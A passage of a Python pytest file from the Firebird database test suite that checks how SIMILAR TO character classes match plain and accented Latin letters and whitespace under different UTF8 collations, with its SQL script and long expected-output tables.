; """ act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1) expected_stdout_1 = """ C a S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C e S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C i S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C o S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C u S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C A S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C E S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C I S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C O S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C U S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C Y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C é S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C à S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C è S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C É S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C À S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C È S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C \\w S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 """ @pytest.mark.version('>=3.0,<4.0') def test_1(act_1: Action): act_1.expected_stdout = expected_stdout_1 act_1.execute() assert act_1.clean_stdout == act_1.clean_expected_stdout # version: 4.0 # resources: None substitutions_2 = [] init_script_2 = """""" db_2 = db_factory(charset='UTF8', sql_dialect=3, init=init_script_2) test_script_2 = """ -- NOTE: -- 1. This test can NOT be applied on 2.5 because of error: -- Statement failed, SQLSTATE = 42000 -- Invalid SIMILAR TO pattern -- 2. Added four characters: 'Ø' 'Ð' 'Ł' and 'Ŀ' - because of fixed CORE-4739 set term ^; execute block as begin begin execute statement 'drop collation co_utf8_ci_ai'; when any do begin end end begin execute statement 'drop collation co_utf8_cs_as'; when any do begin end end begin execute statement 'drop collation co_utf8_ci_as'; when any do begin end end end ^ set term ;^ commit; create collation co_utf8_ci_ai for utf8 from unicode case insensitive accent insensitive; create collation co_utf8_cs_as for utf8 from unicode case sensitive accent sensitive; create collation co_utf8_ci_as for utf8 from unicode case insensitive accent sensitive; commit; set list on; with recursive d as ( select cast('aeiouyAEIOUYáéíóúýàèìòùâêîôûãñõäëïöüÿçšąęźżăşţÁÉÍÓÚÝÀÈÌÒÙÂÊÎÔÛÃÑÕÄËÏÖÜŸÇŠĄĘŹŻĂŞŢ' || ascii_char(9) || ascii_char(10) || ascii_char(32) || 'øðłŀØÐŁĿ' -- added 14.10.2019 as varchar(100) character set utf8 ) s from rdb$database ) ,r as(select 1 i from rdb$database union all select r.i+1 from r where r.i < 100) ,e as( select substring(d.s from r.i for 1) c from d join r on r.i <= char_length(d.s) ) select decode( e.c, ascii_char(9),' ', ascii_char(10),' ', ascii_char(32), '\\w', e.c ) c -- ALPHA Latin letters a..z and A..Z. With an accent-insensitive collation, -- this class also matches accented forms of these characters. ,iif( e.c collate co_utf8_ci_ai similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_as -- [:LOWER:] Lowercase Latin letters a..z. Also matches uppercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:LoWer:]]', 1, 0 ) s_lower_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:lOwEr:]]', 1, 0 ) s_lower_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:lowER:]]', 1, 0 ) s_lower_ci_as -- [:UPPER:] Uppercase Latin letters A..Z. Also matches lowercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:uPPer:]]', 1, 0 ) s_upper_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:uPpeR:]]', 1, 0 ) s_upper_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:UpPeR:]]', 1, 0 ) s_upper_ci_as -- [:WHITESPACE:] Matches vertical tab (ASCII 9), linefeed (ASCII 10), horizontal -- tab (ASCII 11), formfeed (ASCII 12), carriage return (ASCII 13) and space (ASCII 32). ,iif( e.c similar to '[[:WhiTespacE:]]', 1, 0 ) s_white_space from e ; """ act_2 = isql_act('db_2', test_script_2, substitutions=substitutions_2) expected_stdout_2 = """ C a S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C e S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C i S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 